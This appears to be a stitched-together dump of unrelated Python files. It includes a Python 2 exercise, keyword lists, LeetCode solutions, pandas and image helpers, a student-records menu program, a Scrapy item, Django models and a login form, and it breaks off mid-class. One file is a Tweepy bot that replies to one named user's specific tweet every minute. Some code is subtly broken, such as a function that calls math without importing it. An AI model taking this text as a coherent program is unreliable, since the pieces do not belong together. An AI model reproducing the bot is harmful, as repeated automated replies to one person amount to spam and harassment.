# Python 2 script: prints a short personal profile using %-formatting.
name = 'Yay Shin'
age = 19 # not a lie
height = 64 # inches
weight = 110 # lbs
eyes = 'Brown'
teeth = 'White'
hair = 'Brown'
print "Let's talk about %s." % name
print "She's %d inches tall." % height
print "She's %d pounds heavy." % weight
print "Actually that's not too heavy."
print "She's got %s eyes and %s hair." % (eyes, hair)
print "His teeth are usually %s depending on the coffee." % teeth
# this line is tricky, try to get it exactly right
print "If I add %d, %d, and %d I get %d." % (
    age, height, weight, age + height + weight)
# Stemmed keyword lists used to bucket text tokens by topic.  Entries are
# word stems ("kera" matches "keras"); the "('a', 'b')" entries are
# NOTE(review): string renderings of bigram tuples -- confirm the consumer
# parses them rather than matching the literal string.
deep_learning = [
    "('deep', 'learn')",
    "kera",
    "('neural', 'network')",
    "tensorflow",
]
machine_learning = [
    "classif",
    "cluster",
    "ensembl",
    "('gradient', 'boost')",
    "graph",
    "knn",
    "machin",
    "model",
    "('mont', 'carlo')",
    "('natur', 'languag')",
    "('parallel', 'process')",
    "('random', 'forest')",
    "sentiment",
    "spark",
    "supervis",
    "('text', 'mine')",
    "tree",
    "unsupervis",
]
# Stemmed analytics keywords (same bigram-string convention as the lists above).
analytics = [
    "analysi",
    "anova",
    "arima",
    "('analyz', 'data')",
    "covari",
    "bayesian",
    "dataanalyt",
    "('databas', 'manag')",
    "eigenvalu",
    # BUG FIX: a missing comma here made Python concatenate the two adjacent
    # literals into the single bogus entry "eigenvectorheteroscedast".
    "eigenvector",
    "heteroscedast",
    "('linear', 'regress')",
    "logist",
    "multicollinear",
    "multivari",
    "mysql",
    "nosql",
    "('odd', 'ratio')",
    "outlier",
    "precis",
    "('princip', 'compon')",
    "python",
    "r",
    "recal",
    "regress",
    "sensit",
    "specif",
    "('stochast', 'model')",
    "tableau",
    "('time', 'seri')",
]
management = ["busi", "('busi', 'analyt')", "leadership", "manag", "strateg"]
|
# [Classic, Coloring-Bipartition]
# https://leetcode.com/problems/is-graph-bipartite/
# 785. Is Graph Bipartite?
# History:
# Facebook
# 1.
# Mar 19, 2020
# 2.
# May 8, 2020
# Given an undirected graph, return true if and only if it is bipartite.
#
# Recall that a graph is bipartite if we can split its set of nodes into two independent subsets
# A and B such that every edge in the graph has one node in A and another node in B.
#
# The graph is given in the following form: graph[i] is a list of indexes j for which the edge
# between nodes i and j exists. Each node is an integer between 0 and graph.length - 1. There
# are no self edges or parallel edges: graph[i] does not contain i, and it doesn't contain any
# element twice.
#
# Example 1:
# Input: [[1,3], [0,2], [1,3], [0,2]]
# Output: true
# Explanation:
# The graph looks like this:
# 0----1
# | |
# | |
# 3----2
# We can divide the vertices into two groups: {0, 2} and {1, 3}.
# Example 2:
# Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
# Output: false
# Explanation:
# The graph looks like this:
# 0----1
# | \ |
# | \ |
# 3----2
# We cannot find a way to divide the set of nodes into two independent subsets.
#
#
# Note:
#
# graph will have length in range [1, 100].
# graph[i] will contain integers in range [0, graph.length - 1].
# graph[i] will not contain i or duplicate values.
# The graph is undirected: if any element j is in graph[i], then i will be in graph[j].
class Solution(object):
    def _dfs(self, node, color, graph, colors):
        """Try to paint `node` with `color` (0 or 1) and propagate the
        opposite color to its neighbors.

        Returns False as soon as a node is found already painted with the
        conflicting color; True if the whole component 2-colors cleanly.
        """
        if node in colors:
            return colors[node] == color
        colors[node] = color
        return all(self._dfs(adj, 1 - color, graph, colors)
                   for adj in graph[node])

    def isBipartite(self, graph):
        """
        :type graph: List[List[int]]
        :rtype: bool

        2-color each connected component via DFS; the graph is bipartite
        iff no component forces two adjacent nodes onto the same color.
        """
        colors = {}
        return all(self._dfs(start, 0, graph, colors)
                   for start in range(len(graph))
                   if start not in colors)
|
# -*- coding: utf-8 -*-
# Date   : 2018/10/14 22:36
# Author : xcl
# Attribute transformation: pivot per-timestamp disk readings into one row
# per collection time, with one column per drive.
import pandas as pd
# Parameter initialisation
discfile = 'C:\\Users\\Administrator\\Desktop\\DiskCapacityPrediction\\data\\discdata.xls' # raw disk data
transformeddata = 'C:\\Users\\Administrator\\Desktop\\discdata_processed.xls' # transformed output
data = pd.read_excel(discfile)
data = data[data['TARGET_ID'] == 184].copy() # keep only rows for TARGET_ID 184
data_group = data.groupby('COLLECTTIME') # group readings by collection time
def attr_trans(x): # transform one time-group into a single wide row
    # NOTE(review): assumes each group contains exactly two VALUE rows, C:
    # drive first then D:, in stable order -- confirm against the spreadsheet.
    result = pd.Series(index = ['SYS_NAME', 'CWXT_DB:184:C:\\', 'CWXT_DB:184:D:\\', 'COLLECTTIME'])
    result['SYS_NAME'] = x['SYS_NAME'].iloc[0]
    result['COLLECTTIME'] = x['COLLECTTIME'].iloc[0]
    result['CWXT_DB:184:C:\\'] = x['VALUE'].iloc[0]
    result['CWXT_DB:184:D:\\'] = x['VALUE'].iloc[1]
    return result
data_processed = data_group.apply(attr_trans) # process group by group
data_processed.to_excel(transformeddata, index = False)
import sys
sys.path.append("/home/whyjay/caffe/python")
sys.path.append("/usr/lib/python2.7/dist-packages/")
import cv2
import numpy as np
import skimage
from IPython import embed
def crop_image(x, target_height=227, target_width=227):
    """Load image file `x` as float32, normalise channels, resize so the
    short side matches the target, center-crop, and resize to the exact
    (target_height, target_width).

    NOTE(review): cv2.resize takes dsize as (width, height); the tuples
    below put the scaled dimension first, so for non-square targets the
    axes may be swapped -- verify before using non-square targets.
    """
    image = skimage.img_as_float(skimage.io.imread(x)).astype(np.float32)
    if len(image.shape) == 2:
        # greyscale: replicate the single channel into 3
        image = np.tile(image[:,:,None], 3)
    elif len(image.shape) == 4:
        # 4-D input: keep index 0 of the last axis
        image = image[:,:,:,0]
    height, width, rgb = image.shape
    if width == height:
        resized_image = cv2.resize(image, (target_height, target_width))
    elif height < width:
        # landscape: scale height to target, then crop the width symmetrically
        resized_image = cv2.resize(
            image,
            (int(width * float(target_height)/height), target_width))
        cropping_length = int((resized_image.shape[1] - target_height) / 2)
        resized_image = resized_image[:,cropping_length:resized_image.shape[1] - cropping_length]
    else:
        # portrait: scale width to target, then crop the height symmetrically
        resized_image = cv2.resize(
            image,
            (target_height, int(height * float(target_width)/width)))
        cropping_length = int((resized_image.shape[0] - target_width) / 2)
        resized_image = resized_image[cropping_length:resized_image.shape[0] - cropping_length,:]
    return cv2.resize(resized_image, (target_height, target_width))
def build_word_vocab(sentence_iterator, word_count_threshold=10): # borrowed this function from NeuralTalk
    """Build word<->index maps over all sentences, keeping words occurring at
    least `word_count_threshold` times, plus a log-frequency bias vector for
    initialising an output layer.

    Python 2 code (print statements).  Index 0 is reserved: '.' is the end
    token in ixtoword and '#START#' the start token in wordtoix.
    Returns (wordtoix, ixtoword, bias_init_vector).
    """
    print 'preprocessing word counts and creating vocab based on word count threshold %d' % (word_count_threshold, )
    word_counts = {}
    nsents = 0
    for sent in sentence_iterator:
        nsents += 1
        for w in sent.lower().split(' '):
            word_counts[w] = word_counts.get(w, 0) + 1
    vocab = [w for w in word_counts if word_counts[w] >= word_count_threshold]
    print 'filtered words from %d to %d' % (len(word_counts), len(vocab))
    ixtoword = {}
    ixtoword[0] = '.'  # period at the end of the sentence. make first dimension be end token
    wordtoix = {}
    wordtoix['#START#'] = 0 # make first vector be the start token
    ix = 1
    for w in vocab:
        wordtoix[w] = ix
        ixtoword[ix] = w
        ix += 1
    # '.' gets one count per sentence so the end token's bias reflects how
    # often sentences end.
    word_counts['.'] = nsents
    bias_init_vector = np.array([1.0*word_counts[ixtoword[i]] for i in ixtoword])
    bias_init_vector /= np.sum(bias_init_vector) # normalize to frequencies
    bias_init_vector = np.log(bias_init_vector)
    bias_init_vector -= np.max(bias_init_vector) # shift to nice numeric range
    return wordtoix, ixtoword, bias_init_vector
def shuffle_block_df(df):
    """Shuffle `df` in blocks of 5 consecutive rows; rows inside a block keep
    their relative order.  Returns a new frame with the index reset.

    NOTE(review): Python 2 code -- `len(index)/5` relies on integer division
    (and np.random.shuffle on a materialised list), and `df.ix` was removed
    in pandas 1.0; porting needs `//`, list(range(...)), and .iloc/.loc.
    """
    index = list(df.index)
    block_idx = range(len(index)/5)
    np.random.shuffle(block_idx)
    new_index = []
    for b in block_idx:
        new_index += index[5*b : 5*(b+1)]
    df = df.ix[new_index]
    return df.reset_index(drop=True)
def shuffle_df(df):
    """Return a copy of `df` with rows in random order and the index reset.

    NOTE(review): `df.ix` was removed in pandas 1.0 -- use .loc/.iloc on
    modern pandas.
    """
    index = list(df.index)
    np.random.shuffle(index)
    df = df.ix[index]
    return df.reset_index(drop=True)
def prep_cocoeval_flickr(ann_df, res_df):
    """Stub: convert Flickr annotation/result dataframes into COCO-eval input.

    Not implemented; the commented dicts below sketch the intended schema.
    """
    pass
    # ann_df uniq image images
    #ann = {'images':None, 'info':'', 'type':'captions', 'annotations':None}
    #ann_caps = {'caption':"afjiwel", 'id':1, 'image_id':2}
    #ann_images = {'id':2}
    #res = [{'caption':'hello', 'image_id':2}, {}]
    # return metric
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class TiebaBnItem(scrapy.Item):
    """Scraped Tieba (Baidu forum) post.

    Field groups: search/source metadata (keyword, url, title, tz_id,
    source, bar_name, project), author info (author, gender), post payload
    (content, image_url, reply), and timestamps (create_time_dt/ts for the
    post, update_dt/ts for the scrape).
    """
    keyword = scrapy.Field()
    url = scrapy.Field()
    title = scrapy.Field()
    tz_id = scrapy.Field()
    source = scrapy.Field()
    author = scrapy.Field()
    create_time_dt = scrapy.Field()
    create_time_ts = scrapy.Field()
    content = scrapy.Field()
    image_url = scrapy.Field()
    gender = scrapy.Field()
    reply = scrapy.Field()
    update_dt = scrapy.Field()
    update_ts = scrapy.Field()
    project = scrapy.Field()
    bar_name = scrapy.Field()
|
# Read four space-separated values and print the 1-based position of the
# first of C1..C3 that equals 1; if none of those match, print 4.
C1, C2, C3, C4 = input().split(" ")
for position, flag in enumerate((C1, C2, C3), start=1):
    if int(flag) == 1:
        print(position)
        break
else:
    print(4)
# -*- coding: UTF-8 -*-
# https://blog.csdn.net/tian_123456789/article/details/78914692
import os
import re
import numpy as np
class Student: # a single student record
    """Record of one student: 3-digit ID, name, three subject scores, total.

    NOTE(review): scores are ints when entered interactively but remain raw
    strings when loaded from students.txt by Init(); Sort() int()s them.
    """
    def __init__(self):
        self.name = ''
        self.ID =''
        # Chinese / maths / English scores (prompts map score1->语文,
        # score2->数学, score3->英语)
        self.score1 = 0
        self.score2 = 0
        self.score3 = 0
        # total of the three scores
        self.sum = 0
def searchByID(stulist, ID): # check whether a student ID already exists
    """Return True if `ID` is already present in `stulist`, else False.

    BUG FIX: the original fell off the end and returned None for the
    not-found case; callers compare with ``== True`` so it worked by
    accident.  An explicit bool makes the contract honest and keeps all
    existing call sites working.
    """
    for item in stulist:
        if item.ID == ID:
            return True
    return False
def Add(stulist,stu): # add one student record
    """Append `stu` to `stulist` (rejecting duplicate IDs) and, on user
    confirmation, persist it by appending one line to students.txt.

    Returns False on a duplicate ID, otherwise None.  Note the student is
    added to the in-memory list even when the user declines to save.
    """
    if searchByID(stulist, stu.ID) == True:
        print("学号已经存在!")
        return False
    stulist.append(stu)
    print (stu.name,stu.ID, stu.score1, stu.score2, stu.score3, stu.sum)
    print ("是否要保存学生信息?")
    nChoose = input("Choose Y/N")
    if nChoose == 'Y' or nChoose == 'y':
        # Append-mode write: one space-separated record per line.
        file_object = open("students.txt", "a")
        file_object.write(stu.ID)
        file_object.write(" ")
        file_object.write(stu.name)
        file_object.write(" ")
        file_object.write(str(stu.score1))
        file_object.write(" ")
        file_object.write(str(stu.score2))
        file_object.write(" ")
        file_object.write(str(stu.score3))
        file_object.write(" ")
        file_object.write(str(stu.sum))
        file_object.write("\n")
        file_object.close()
        print (u"保存成功!")
def Search(stulist, ID): # look up and print one student record
    """Print the record whose ID matches `ID`; otherwise print a
    not-found message.

    BUG FIX: the original reset `count` to 0 on every loop iteration and
    then compared it with len(stulist), so the "no such ID" message could
    only ever appear for an empty list.  A simple found-flag expresses the
    intent directly.
    """
    print (u"学号 姓名 语文 数学 英语 总分")
    found = False
    for item in stulist:
        if item.ID == ID:
            print (item.ID, '\t' ,item.name,'\t', item.score1,'\t',item.score2, '\t', item.score3, '\t',item.sum)
            found = True
            break
    if not found:
        print ("没有该学生学号!")
def Del(stulist, ID): # delete one student record
    """Remove the first student whose ID matches `ID` from `stulist`, then
    rewrite students.txt from the remaining in-memory records.

    BUG FIX: the original closed the file inside the per-student write loop
    (and closed it a second time afterwards), so persisting more than one
    remaining record raised "ValueError: I/O operation on closed file".
    A `with` block guarantees exactly one close, even on error.
    """
    for item in stulist:
        if item.ID == ID:
            stulist.remove(item)
            print ("删除成功!")
            break
    # Rewrite the whole file from the in-memory list.
    with open("students.txt", "w") as file_object:
        for stu in stulist:
            print (stu.ID, stu.name, stu.score1,stu.score2, stu.score3, stu.sum)
            file_object.write(" ".join([stu.ID, stu.name, str(stu.score1),
                                        str(stu.score2), str(stu.score3),
                                        str(stu.sum)]))
            file_object.write("\n")
def Change(stulist, ID):
    """Replace the record with `ID`: drop it, rewrite students.txt, then
    prompt for a fresh record and Add() it.

    NOTE(review): if `ID` is not found the file is still rewritten and a new
    student is prompted for regardless -- confirm that is intended.  Also
    note the list is mutated while being iterated (safe only because at most
    one record matches a unique ID).
    """
    count = 0
    for item in stulist:
        if item.ID == ID:
            stulist.remove(item)
    # Rewrite the file from the remaining records (same format Add uses).
    file_object = open("students.txt", "w")
    for stu in stulist:
        #print li.ID, li.name, li.score
        file_object.write(stu.ID)
        file_object.write(" ")
        file_object.write(stu.name)
        file_object.write(" ")
        file_object.write(str(stu.score1))
        file_object.write(" ")
        file_object.write(str(stu.score2))
        file_object.write(" ")
        file_object.write(str(stu.score3))
        file_object.write(" ")
        file_object.write(str(stu.sum))
        file_object.write("\n")
    # print "保存成功!"
    file_object.close()
    # Prompt for the replacement record: 3-digit ID, scores in (0, 100].
    stu = Student()
    stu.name = input("请输入学生的姓名")
    while True:
        stu.ID = input("请输入学生的ID")
        p = re.compile('^[0-9]{3}$')
        if p.match(stu.ID):
            break
        else:
            print ("输入的有错误!")
    while True:
        stu.score1 = int(input("请输入学生语文成绩"))
        if stu.score1 <= 100 and stu.score1 > 0 :
            break
        else:
            print ("输入的学生成绩有错误!")
    while True:
        stu.score2 = int(input("请输入学生数学成绩"))
        if stu.score2 <= 100 and stu.score2 > 0 :
            break
        else:
            print ("输入的学生成绩有错误!")
    while True:
        stu.score3 = int(input("请输入学生英语成绩"))
        if stu.score3 <= 100 and stu.score3 > 0 :
            break
        else:
            print ("输入的学生成绩有错误!")
    stu.sum = stu.score1 + stu.score2 + stu.score3
    Add(stulist,stu)
def display(stulist): # print all student records
    """Print a header row, then one tab-separated line per student."""
    print (u"学号 姓名 语文 数学 英语 总分")
    for stu in stulist:
        print (stu.ID, '\t' ,stu.name,'\t', stu.score1,'\t',stu.score2, '\t', stu.score3, '\t',stu.sum)
def Sort(stulist): # sort students by total score and display them
    """Sort `stulist` in place by total score (highest first) and print it.

    Builds the parallel list of int totals used as sort keys by
    insertSort().  The original also built a per-student `Stu` row list
    that was never read anywhere -- dead code, removed.
    """
    sum_count = [int(li.sum) for li in stulist]
    insertSort(sum_count, stulist)
    display(stulist)
def insertSort(a, stulist):
    """Selection-style sort: reorder `stulist` in descending order of the
    parallel key list `a` (total scores); both lists are sorted in place.

    BUG FIX: the original swapped only `stulist` and left `a` untouched, so
    subsequent comparisons used stale keys and the result was not actually
    sorted.  The two lists must be swapped in lockstep.
    """
    for i in range(len(a) - 1):
        for j in range(i + 1, len(a)):
            if a[i] < a[j]:
                a[i], a[j] = a[j], a[i]
                stulist[i], stulist[j] = stulist[j], stulist[i]
def Init(stulist): # load saved records into stulist, then run the menu
    """Populate `stulist` from students.txt, then start the menu loop.

    NOTE(review): scores stay as the raw strings read from the file (only
    Sort() converts them with int() later), and main() is invoked from
    here rather than by the caller, so Init() only returns when the menu
    loop exits.  Raises IOError/FileNotFoundError if students.txt is absent.
    """
    print ("初始化......")
    file_object = open('students.txt', 'r')
    for line in file_object:
        stu = Student()
        line = line.strip("\n")
        s = line.split(" ")
        stu.ID = s[0]
        stu.name = s[1]
        stu.score1 = s[2]
        stu.score2 = s[3]
        stu.score3 = s[4]
        stu.sum = s[5]
        stulist.append(stu)
    file_object.close()
    print ("初始化成功!")
    main()
def main(): # menu loop: the interactive entry point of the program
    """Loop forever showing the menu and dispatching on the user's choice:
    1 add, 2 search, 3 delete, 4 change, 5 list all, 6 sort by score,
    0 quit.  Operates on the module-level `stulist`.
    """
    while True:
        print ("*********************")
        print (u"--------菜单---------")
        print (u"增加学生信息--------1")
        print (u"查找学生信息--------2")
        print (u"删除学生信息--------3")
        print (u"修改学生信息--------4")
        print (u"所有学生信息--------5")
        print (u"按照分数排序--------6")
        print (u"退出程序------------0")
        print ("*********************")
        nChoose = input("请输入你的选择:")
        if nChoose == "1":
            # Collect a new record: 3-digit ID, scores in (0, 100].
            stu = Student()
            stu.name = input("请输入学生的姓名")
            while True:
                stu.ID = input("请输入学生的ID")
                p = re.compile('^[0-9]{3}$')
                if p.match(stu.ID):
                    break
                else:
                    print ("输入的有错误!")
            while True:
                stu.score1 = int(input("请输入学生语文成绩"))
                if stu.score1 <= 100 and stu.score1 > 0 :
                    break
                else:
                    print ("输入的学生成绩有错误!")
            while True:
                stu.score2 = int(input("请输入学生数学成绩"))
                if stu.score2 <= 100 and stu.score2 > 0 :
                    break
                else:
                    print ("输入的学生成绩有错误!")
            while True:
                stu.score3 = int(input("请输入学生英语成绩"))
                if stu.score3 <= 100 and stu.score3 > 0 :
                    break
                else:
                    print ("输入的学生成绩有错误!")
            stu.sum = stu.score1 + stu.score2 + stu.score3
            Add(stulist,stu)
        if nChoose == '2':
            ID = input("请输入学生的ID")
            Search(stulist, ID)
        if nChoose == '3':
            ID = input("请输入学生的ID")
            Del(stulist, ID)
        if nChoose == '4':
            ID = input("请输入学生的ID")
            Change(stulist, ID)
        if nChoose == '5':
            display(stulist)
        if nChoose == '6':
            Sort(stulist)
        if nChoose == '0':
            break
if __name__ == '__main__':
    # Program entry: load persisted records; Init() itself hands off to main().
    stulist =[]
    Init(stulist)
import numpy as np
import matplotlib.pylab as pl
# Load scattered field data: point coordinates (x, y) and a scalar value p
# per point, one value per line in each file.
x = np.loadtxt('./data/x.txt')
y = np.loadtxt('./data/y.txt')
p = np.loadtxt('./data/p.txt')
print(sum(p))  # quick sanity check: total of the scalar field
pl.figure(figsize=(10.,10.), dpi=1000)
pl.xlim((300,500))
pl.ylim((250,450))
# Filled triangulated contour plot with 300 levels over the scattered points.
pl.tricontourf(x,y,p, 300,cmap='hot')
#pl.tricontour(x,y,p, 300,cmap='hot')
#pl.scatter(x,y,c=p, cmap = 'hot')
pl.colorbar()
pl.savefig('TW.png')
import time
import schedule
import tweepy
from argparse import ArgumentParser
from src.generator import Generator
import logging
from logging import getLogger
from src.log import init_logging
init_logging(level = logging.INFO)  # configure handlers once at import time
logger = getLogger(__name__)  # module-level logger used by jan_lisa()
def gen_api(CK, CS, AK, AS):
    """Build an authenticated tweepy API client from consumer (CK/CS) and
    access (AK/AS) credentials."""
    handler = tweepy.OAuthHandler(CK, CS)
    handler.set_access_token(AK, AS)
    return tweepy.API(handler)
def jan_lisa(api, gen):
    """Generate one text with `gen` and tweet it as a reply to a fixed
    status of a fixed user; failures are logged and swallowed so the
    scheduler keeps running.
    """
    user = 'LeeKaixin2003'
    tweet_id = 1394936576078090244
    try:
        x = gen.generate()
        x = '@{} {}'.format(user, x)
        api.update_status(
            status = x,
            in_reply_to_status_id = tweet_id)
        logger.info('tweeted: {}'.format(x))
    except Exception as e:
        # BUG FIX: the original called logger.info('failed:', e), passing
        # the exception as a %-format argument with no placeholder in the
        # message -- the logging machinery then raises a formatting error
        # internally and the exception detail is lost.
        logger.info('failed: %s', e)
def main():
    """Parse Twitter credentials from the CLI, build the API client, and
    tweet a generated reply at second :00 of every minute.

    Blocks forever in the schedule polling loop.
    """
    parser = ArgumentParser()
    parser.add_argument('--consumer-key')
    parser.add_argument('--consumer-secret')
    parser.add_argument('--api-key')
    parser.add_argument('--api-secret')
    args = parser.parse_args()
    api = gen_api(
        CK = args.consumer_key,
        CS = args.consumer_secret,
        AK = args.api_key,
        AS = args.api_secret)
    gen = Generator()
    # The lambda captures api/gen so the scheduled job needs no globals.
    schedule.every().minute.at(':00').do(lambda : jan_lisa(api, gen))
    while True:
        schedule.run_pending()
        time.sleep(1)
if __name__ == '__main__':
    main()
import os
import json
import requests
import zipfile
from django.db import models
from django.utils.functional import cached_property
import pygame
from common.models import ModelBase
from mapper import consts
pygame.mixer.init()  # required before Map.music_file_duration can load audio
class Mapper(ModelBase):
    """A map author/uploader; Map rows point here via a foreign key."""
    # Imported data
    id = models.CharField(verbose_name="Mapper ID", max_length=31, primary_key=True)
    username = models.CharField(
        verbose_name="ユーザー名", max_length=255, null=True
    )  # fetched automatically later
    latest_uploaded = models.DateTimeField(
        verbose_name="最終アップロード日", db_index=True, null=True
    )
    # Internal bookkeeping
    latest_processed = models.DateTimeField(
        verbose_name="最終処理日", db_index=True, null=True
    )
    class Meta:
        db_table = "mapper"
    def update_latest_uploaded(self):
        """Recompute latest_uploaded as the max uploaded date of this
        mapper's maps and save the row."""
        aggregated = self.map_set.aggregate(models.Max("uploaded"))
        self.latest_uploaded = aggregated.get("uploaded__max")
        self.save()
class Map(ModelBase):
    """An uploaded map plus helpers for downloading and extracting its
    zip archive and inspecting the extracted contents."""
    id = models.CharField(verbose_name="Map ID", max_length=7, primary_key=True)
    name = models.CharField(verbose_name="曲名", max_length=255)
    uploaded = models.DateTimeField(verbose_name="アップロード日", db_index=True)
    duration = models.FloatField(verbose_name="曲の長さ", default=0)
    origin = models.TextField(verbose_name="オリジナルデータ")
    downloaded = models.BooleanField("ダウンロード完了フラグ", default=False)
    mapper = models.ForeignKey(Mapper, on_delete=models.CASCADE)

    class Meta:
        db_table = "map"

    @property
    def display_duration(self):
        """Duration formatted as m:ss.

        BUG FIX: seconds are now zero-padded; the original rendered
        3m05s as "3:5".
        """
        return "{}:{:02d}".format(int(self.duration / 60), int(self.duration) % 60)

    @property
    def download_file_path(self):
        # Local path of the downloaded zip archive.
        return os.path.join(consts.DOWNLOAD_DIR, self.id + ".zip")

    @property
    def extract_path(self):
        # Directory the archive is extracted into.
        return os.path.join(consts.EXTRACT_DIR, self.id)

    @property
    def origin_data(self):
        """Parse and return the stored original JSON payload."""
        return json.loads(self.origin)

    @property
    def download_url(self):
        return consts.BASE_URL + self.origin_data.get("directDownload")

    @cached_property
    def info_dat(self):
        """Parsed info.dat from the extracted archive, or None if absent."""
        info_path = os.path.join(self.extract_path, "info.dat")
        if not os.path.isfile(info_path):
            return
        with open(info_path, "r", encoding="utf-8") as fp:
            dat = json.load(fp)
        return dat

    @cached_property
    def music_file_duration(self):
        """Length in seconds of the song file referenced by info.dat."""
        song_file = os.path.join(self.extract_path, self.info_dat.get("_songFilename"))
        song = pygame.mixer.Sound(song_file)
        return song.get_length()

    def download(self):
        """Fetch the archive once and flag the row as downloaded."""
        if self.downloaded:
            return
        response = requests.get(self.download_url, headers=consts.headers)
        with open(self.download_file_path, "wb") as fp:
            fp.write(response.content)
        self.downloaded = True
        self.save()

    def extract_zip(self):
        """Extract the downloaded archive into extract_path (idempotent).

        Raises FileNotFoundError if the archive has not been downloaded.
        """
        if not os.path.isfile(self.download_file_path):
            raise FileNotFoundError()
        if os.path.isdir(self.extract_path):
            return
        try:
            # BUG FIX: the mode was the decimal literal 755 (== 0o1363);
            # permission bits must be written in octal.
            os.makedirs(self.extract_path, 0o755, exist_ok=True)
            with zipfile.ZipFile(self.download_file_path) as fp:
                fp.extractall(self.extract_path)
        except zipfile.BadZipFile as e:
            # NOTE(review): os.rmdir only removes an *empty* directory; a
            # partially extracted archive would make this cleanup raise.
            # Consider shutil.rmtree -- left unchanged to keep the fix minimal.
            os.rmdir(self.extract_path)
            raise e
# (code, label) choice pairs for Difficulty.code; DIFFICULTY_DICT inverts
# them to map label -> code.
DIFFICULTY_CHOICES = (
    (0, "Easy"),
    (1, "Normal"),
    (2, "Hard"),
    (3, "Expert"),
    (4, "ExpertPlus"),
)
DIFFICULTY_DICT = {t[1]: t[0] for t in DIFFICULTY_CHOICES}
class Difficulty(ModelBase):
    """Per-difficulty statistics for one Map (one row per difficulty)."""
    map = models.ForeignKey(Map, on_delete=models.CASCADE, db_index=True)
    code = models.IntegerField("難易度", choices=DIFFICULTY_CHOICES)
    notes_count = models.IntegerField("ノーツ数")
    notes_per_sec = models.FloatField("NPS", default=0.0)
    speed = models.IntegerField(verbose_name="スピード")
    obstacles = models.IntegerField(verbose_name="壁の数")
    bombs = models.IntegerField(verbose_name="ボムの数")
    distance_per_sec = models.FloatField("セイバーの移動距離", default=0.0)
    class Meta:
        db_table = "difficulty"
|
#https://leetcode.com/problems/power-of-three/
def isPowerOfThree(n):
    """Return True when n is an exact power of three (3**0 == 1 counts).

    BUG FIX: the original used ``n = n/3`` which, in Python 3, produces a
    float and loses exactness for large n (e.g. 3**40); integer floor
    division keeps the loop exact for arbitrarily large ints.
    """
    if n < 1:
        return False
    while n % 3 == 0:
        n //= 3
    return n == 1
def isPowerOfThree(n):
    """True when log base 3 of n is numerically an integer (tolerance 1e-10)."""
    if n <= 0:
        return False
    exponent = math.log(n, 3)
    return abs(exponent - round(exponent)) < 1e-10
def isPowerOfThree(n):
    """True iff n > 0 and n divides 3**19, the largest power of three
    that fits in a signed 32-bit integer."""
    MAX_POW3 = 1162261467  # 3 ** 19
    return n > 0 and MAX_POW3 % n == 0
|
import os
def run(DATA_DIR, INCEPTION_CHECKPOINT, MODEL_DIR, TRAIN_STEPS, GPU_DEVICE = 0, VOCAB_FILE=""):
    '''
    Launch the im2txt training script as a subcommand.

    :param DATA_DIR: str, Path to the directory containing TF Records files
    :param INCEPTION_CHECKPOINT: str, Path to the directory containing the checkpoint file
    :param MODEL_DIR: str, Path to directory saving or restoring model file
    :param TRAIN_STEPS: int, Number of steps for the training
    :param GPU_DEVICE: int, Index of the gpu device to use for the training
           (list devices with tensorflow.python.client.device_lib.list_local_devices())
    :param VOCAB_FILE: str, Path to the directory containing vocabulary dictionary file
    :return: None
    '''
    # Path to library train.py relative to the working directory.
    CODE_PATH = "../library"
    DATA_DIR = os.path.abspath(DATA_DIR)
    INCEPTION_CHECKPOINT = os.path.abspath(INCEPTION_CHECKPOINT)
    MODEL_DIR = os.path.abspath(MODEL_DIR)
    VOCAB_FILE = os.path.abspath(VOCAB_FILE)
    # BUG FIX: os.environ values must be strings; the original assigned
    # the raw int, raising TypeError for any non-zero GPU_DEVICE.
    os.environ["CUDA_VISIBLE_DEVICES"] = str(GPU_DEVICE)
    command = (
        "python {code}/train.py"
        " --input_file_pattern={data}/train-?????-of-00256"
        " --inception_checkpoint_file={ckpt}"
        " --train_dir={model}/train"
        " --train_inception=false"
        " --number_of_steps={steps}"
        " --vocab_file={vocab}"
    ).format(code=CODE_PATH, data=DATA_DIR, ckpt=INCEPTION_CHECKPOINT,
             model=MODEL_DIR, steps=TRAIN_STEPS, vocab=VOCAB_FILE)
    # Run the training script.
    os.system(command)
import sys
from collections import defaultdict
# NOTE(review): pair_record is never used; presumably a leftover from a
# version that de-duplicated edges. Confirm before deleting.
pair_record = set()
# vertex id -> degree; each edge line increments both endpoints.
sequence = defaultdict(int)
for line in sys.stdin:
    vid1, vid2 = map(int, line.split())
    sequence[vid1]+=1
    sequence[vid2]+=1
try:
    # With an explicit vertex count argv[1]: print degrees for 0..n-1,
    # including isolated vertices (defaultdict reports them as 0).
    n = int(sys.argv[1])
    for v in range(n):
        k = sequence[v]
        print('{} {}'.format(v, k))
except:
    # No/invalid count argument: print only vertices actually seen.
    # NOTE(review): the bare except also hides unrelated errors; narrow
    # to (IndexError, ValueError) when touching this code.
    for v, k in sequence.items():
        print('{} {}'.format(v, k))
|
from django import forms
from cloudinary.forms import CloudinaryJsFileField, CloudinaryUnsignedJsFileField
from cloudinary.forms import CloudinaryFileField
from django.contrib.auth.forms import UserCreationForm,UserChangeForm
from django.contrib.auth import (
authenticate,
get_user_model,
login,
logout,
)
from modules.customers.models import Customer
# Resolve the project's active user model (honours AUTH_USER_MODEL).
User = get_user_model()
class UserLoginForm(forms.Form):
    """Login form that validates submitted credentials via authenticate()."""
    username = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'type': 'text','name':'username', 'placeholder':'Email or Username', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
    password = forms.CharField(max_length=100, widget=forms.PasswordInput(attrs={'type': 'Password','name':'password', 'placeholder':'Password', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))

    def clean(self, *args, **kwargs):
        """Authenticate the credentials; raise ValidationError on failure."""
        username = self.cleaned_data.get("username")
        password = self.cleaned_data.get("password")
        if username and password:
            user = authenticate(username=username, password=password)
            if not user:
                raise forms.ValidationError("This user does not exist")
            # NOTE(review): authenticate() already verified the password
            # for the default backend, so this branch is normally dead —
            # kept for custom backends. (Typo "passsword" fixed.)
            if not user.check_password(password):
                raise forms.ValidationError("Incorrect password")
            # Typo fix: "is not longer" -> "is no longer".
            if not user.is_active:
                raise forms.ValidationError("This user is no longer active.")
        return super(UserLoginForm, self).clean(*args, **kwargs)
class UserRegisterForm(forms.ModelForm):
    """Registration form with email and password confirmation fields."""
    # Confirmation fields; compared against 'email'/'password' below.
